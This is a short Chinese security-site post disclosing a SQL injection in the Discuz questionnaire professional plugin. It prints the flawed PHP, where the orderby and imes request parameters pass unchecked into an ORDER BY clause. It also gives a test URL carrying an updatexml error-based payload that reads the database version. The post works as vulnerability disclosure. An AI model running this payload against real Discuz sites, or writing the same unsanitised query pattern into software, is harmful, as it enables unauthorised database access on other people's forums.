Discuz问卷调查专业版插件注入

没穿底裤 2020年1月1日03:05:35评论630 views字数 1015阅读3分23秒阅读模式
摘要

nds_ques_viewanswer.inc.php测试方式:

nds_ques_viewanswer.inc.php

<?PHP  if(!defined('IN_DISCUZ')) {         exit('Access Denied'); }    !empty($_G['gp_srchtxt'])? $wherestr .= " AND  author = '".dhtmlspecialchars(trim(substr($_GET['srchtxt'],0,20)))."' " :'' ;     $orderby = $_G['gp_orderby']? $_G['gp_orderby']:'dateline';//获取参数     $imes = $_G['gp_imes']? $_G['gp_imes']:'DESC';     $questopics = DB::fetch_first("SELECT * FROM ".DB::table('ques_topic')." WHERE `topicid`='$topicid'");     $sysmode = $questopics['ques_mode'];            ....                 $magiccount =  DB::result(DB::query("SELECT COUNT(*) FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' LIMIT 1"), 0);                    $multipage = multi($magiccount, $perpage, $page, "plugin.php?id=nds_up_ques:nds_up_ques&action=viewanswer&topicid=".$topicid."&orderby=".$orderby."&imes=".$imes);                 $topiclist = '';                 $nid = $start_limit+1;         $query = DB::query(" SELECT * FROM ".DB::table('ques_user')." WHERE `topicid`='$topicid' ".$wherestr."  ORDER by $orderby $imes LIMIT $start_limit,$perpage");//带入查询 ....  ?>

测试方式:

/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline and 1=(updatexml(1,concat(0x27,version()),1))--

Discuz问卷调查专业版插件注入

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:05:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Discuz问卷调查专业版插件注入http://cn-sec.com/archives/76302.html

发表评论

匿名网友 填写信息